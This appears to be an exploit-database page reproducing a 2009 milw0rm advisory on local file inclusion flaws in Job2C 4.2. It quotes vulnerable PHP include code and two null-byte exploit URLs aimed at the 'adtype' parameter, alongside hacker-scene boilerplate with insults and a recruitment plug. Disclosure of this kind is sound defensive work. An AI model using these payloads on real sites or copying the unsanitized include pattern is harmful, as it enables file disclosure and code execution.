Job2C version 4.2 (adtype) MulTiple LFi

vendor:

Job2C

by:

ZoRLu

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Job2C

Affected Version From: 4.2

Affected Version To: 4.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Job2C version 4.2 (adtype) MulTiple LFi

Job2C version 4.2 is vulnerable to multiple Local File Inclusion (LFI) vulnerabilities. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'adtype' parameter in 'windetail.php' and 'detail.php' scripts. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious 'adtype' parameter value to the vulnerable script. This can allow the attacker to include and execute arbitrary local files on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

[~] Job2C version 4.2 (adtype) MulTiple LFi
[~]
[~] Script: http://www.w2b.ru/download/Job2C.zip
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 15.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com 
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

file: 

windetail.php

err0r c0de:

$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"];                 ( err0r c0de 1 )
$title=$_REQUEST["title"];

	winHead($title);
	include("lib/".$adtype.".inc");    ( err0r c0de 2 )
	
exp 1:
	
yildirimordulari.com/script/windetail.php?adtype=LFÃ%00

file:

detail.php

err0r c0de:

$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"];         ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";

	include("lib/".$adtype.".inc");    ( err0r c0de 1 )	
	

exp 2:

yildirimordulari.com/script/detail.php?adtype=LFÃ%00


[~] ----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & stack
[~]
[~] yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] ----------------------------------------------------------------------

# milw0rm.com [2009-04-15]